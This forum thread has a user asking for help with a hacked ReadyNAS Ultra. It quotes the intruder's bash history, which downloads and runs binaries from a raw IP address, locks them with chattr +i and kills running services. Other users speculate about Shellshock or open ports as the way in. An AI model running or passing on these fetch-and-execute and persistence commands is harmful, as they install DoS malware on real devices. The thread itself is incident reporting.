NETGEAR is aware of a growing number of phone and online scams. To learn how to stay safe click here.

Forum Discussion

kooolkat's avatar
kooolkat
Tutor
Oct 28, 2014

ReadyNas Ultra hacked

Hi,

I think my ReadyNas Ultra is hacked to send Dos attacks. I found this under bash_history in the root directory.

c:
/c/
sickbeard
chmmod 777 sickbeard.log
"chmod 777 sickbeard.log"
passwd
ps -ef
killall -9 mt-daapd
killall -9 ifplugd
killall -9 proftpd
wget http://222.186.34.143:123/ssh26
chmod +x ssh26
./ssh26
chattr +i ssh26
ps -ef
killall -9 ssh26
killall -9 .sshd
killall -9 ssh2
wget http://222.186.34.143:123/26ssh33
chmod +x 26ssh33
./26ssh33
chattr +i 26ssh33
ps -ef
wget http://222.186.34.143:123/ssh33
chmod +x ssh33
./ssh33
chattr +i ssh33

It's not possible to delete the ssh33, ssh26 and 26ssh33 file in root directory. There are also files called bashrc, profile, conf.n

Any help to get rid of the problem are much appreciated.
Other Discussions
Questions

9 Replies

Replies have been turned off for this discussion
  • ynohtna's avatar
    ynohtna
    Tutor
    Oct 28, 2014
    how did you get hacked? A service you use? opening ports to it?
  • kooolkat's avatar
    kooolkat
    Tutor
    Oct 28, 2014
    I think someone used the "ShellShock" vulnerability before I updated to RAIDiator-x86 4.2.27 or possibly open ports regarding sickbeard.
  • ynohtna's avatar
    ynohtna
    Tutor
    Oct 28, 2014
    is the only way to know if you've been hacked via ssh and checking for files?

    Is there something PFSENSE can show in regards to bad types of traffic or whatever?
  • kooolkat's avatar
    kooolkat
    Tutor
    Oct 28, 2014
    I found out when my router got overloaded with inbound traffic. I then used winspc to root access and discovered the files. I don´t know regarding PFSENSE
  • StephenB's avatar
    StephenB
    Guru - Experienced User
    Oct 28, 2014
    We've also seen 1 or 2 recent cases posted here when the local lan was overloaded with traffic.

    If the hack doesn't generate a lot of traffic or obvious misbehavior of the NAS functions it would be hard to spot.
  • kooolkat's avatar
    kooolkat
    Tutor
    Oct 30, 2014
    mdgm wrote:
    Yes your NAS is hacked. Sending you a PM.


    NAS up and running as normal because of good help from mdgm. Thax allot :)

NETGEAR Academy

Boost your skills with the Netgear Academy - Get trained, certified and stay ahead with the latest Netgear technology! 

Join Us!

ProSupport for Business

Comprehensive support plans for maximum network uptime and business peace of mind.

 

Learn More